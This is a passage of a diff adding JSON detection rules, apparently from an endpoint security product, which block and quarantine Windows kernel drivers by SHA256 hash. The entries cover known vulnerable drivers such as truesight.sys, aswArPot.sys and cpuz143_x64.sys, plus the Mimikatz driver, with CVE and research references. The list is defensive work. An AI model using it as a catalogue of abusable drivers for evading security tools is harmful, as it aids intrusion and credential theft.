+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aaa3459bcac25423f78ed72dbae4d7ef19e7c5c65770cbe5210b14e33cd1816c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a138f940-5851-5ac4-a789-44279cd09021",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143788Z",
+ "creation_date": "2026-03-23T11:45:31.143790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3dff040ce865489dbbec07b54d52c282d4b1e7ec468d54e1c90d086a3522255",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a13b20e2-1009-53bb-8472-3f2d356e9867",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143060Z",
+ "creation_date": "2026-03-23T11:45:31.143061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd978d1bf595a536361017627a37929a7cea97b7ff0481526efa59f3cef6b479",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a141398c-4faa-50ca-8d4a-497300e18a03",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813863Z",
+ "creation_date": "2026-03-23T11:45:31.813865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813885Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bb3e25e7a482bf47179ac18e747037f9515d058824f0c07fc323027d4d0bf13",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a145fc68-aead-5cec-8a4a-f170b5ec31e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611308Z",
+ "creation_date": "2026-03-23T11:45:29.611309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b46fb3ed5a7a84ef594ab0b76f384aa2dca0614574478fb98308806612609465",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a14626ad-8043-5ff0-bd15-099db05a290d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159193Z",
+ "creation_date": "2026-03-23T11:45:31.159195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "426f0507ecdd90b1fd400d79c2fb0e2b62ae329647ab9511139a8b450da0c327",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a152c187-c038-54ab-bc80-cf0f8ffcb6cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810182Z",
+ "creation_date": "2026-03-23T11:45:31.810184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18e64cc0071989c4052112a2566fe2a70daebec57de48c335357729afca7da72",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a15529a5-6d6a-53d7-aca9-57945c4cb1d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482370Z",
+ "creation_date": "2026-03-23T11:45:31.482374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "913fe318fb59a71cf9e5071009c9bc8db146b31da716980757e4744d48dc3f90",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1630155-da2c-51cf-9fe0-02be02687a55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828173Z",
+ "creation_date": "2026-03-23T11:45:30.828175Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828180Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e6d3b0e2bc567dc978a349e58c3dca212a75b09da7d944e5168b9de84ca883e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a169b8e4-42ac-563b-9e45-d94ee3cd6b70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969612Z",
+ "creation_date": "2026-03-23T11:45:29.969614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03a54ad77fc453c9889e170a811d232a305d46fb7f59582d3f1cb234598507a1",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a16cdef7-d758-5008-8506-3342d94bae27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827840Z",
+ "creation_date": "2026-03-23T11:45:31.827842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e290d8863ca733d2dce2716dd2527cc1fc2698a0c5e8defdb3ba9a320c3aaaa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a18ce454-f8c7-58ce-b538-44be0f92a0a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614506Z",
+ "creation_date": "2026-03-23T11:45:29.614508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a18f9c26-3ab9-5ac1-a49b-c5cc8c362d5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617413Z",
+ "creation_date": "2026-03-23T11:45:29.617415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83ffcfaf429c8368194d7b73f7729d97d6a3b80fb203d57055f3e4eec8228914",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a18fc74d-2660-5ff1-b3e7-d6363648cc6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154350Z",
+ "creation_date": "2026-03-23T11:45:31.154352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbac1a38b4e028dd833b9a1e1d7a829f3e4520846fd312ac8c3ef310c235d27f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a19ffef0-a445-5c7a-9db6-b1b4c7cdb375",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814886Z",
+ "creation_date": "2026-03-23T11:45:31.814890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48f81bd54cc3e4d049f9a88d3952c6e7fba1097785001be9bc4e4aa581eb2479",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1af1167-2942-56fd-97d4-f6c795e7615c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979794Z",
+ "creation_date": "2026-03-23T11:45:29.979796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79278979d9300670d1084493bbc03ae374efc5ab02850941e85753885fa88e47",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1b248aa-0d41-5619-a86a-7ab9478ab7b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822544Z",
+ "creation_date": "2026-03-23T11:45:31.822546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e66650e0dcdee274e2b23263027ae9a0d6efaffb81fd7c51ab0f542175e49ed4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1c4d6a8-3a25-52e9-b149-8352002efd1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825476Z",
+ "creation_date": "2026-03-23T11:45:31.825478Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6111959c7d497cdf76b482c20ba18c11ff075af083cd6143527e5ed5cc902c07",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1d62b8b-e4ec-5085-8e0a-35fcfb725ffe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970964Z",
+ "creation_date": "2026-03-23T11:45:29.970967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d172d95afc72a8a4a6362175bd68b5f4405f166fff94464d845213af586fe8bd",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1d76c4d-6f19-59c4-9dcf-ad77d2b00873",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980958Z",
+ "creation_date": "2026-03-23T11:45:29.980960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bceaf970b60b4457eca3c181f649a1c67f4602778171e53d9bdc9b97a09603ca",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1e19de0-8952-508b-b869-67b8c9af3f82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980785Z",
+ "creation_date": "2026-03-23T11:45:29.980787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980792Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9544fbc011638cbc168f6ea4740cc6ed6fd331769e191fd64bdf9113eb64fde1",
+ "comment": "Vulnerable Kernel Driver (aka PanMonFltX64.sys) [https://www.loldrivers.io/drivers/40bfb01b-d251-4c2c-952e-052a89a76f5b/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1e6553d-bd83-50d3-8003-124ab5210717",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465957Z",
+ "creation_date": "2026-03-23T11:45:30.465960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a1f74978-6ec7-5a57-b81f-3047f4d09245",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615895Z",
+ "creation_date": "2026-03-23T11:45:29.615897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
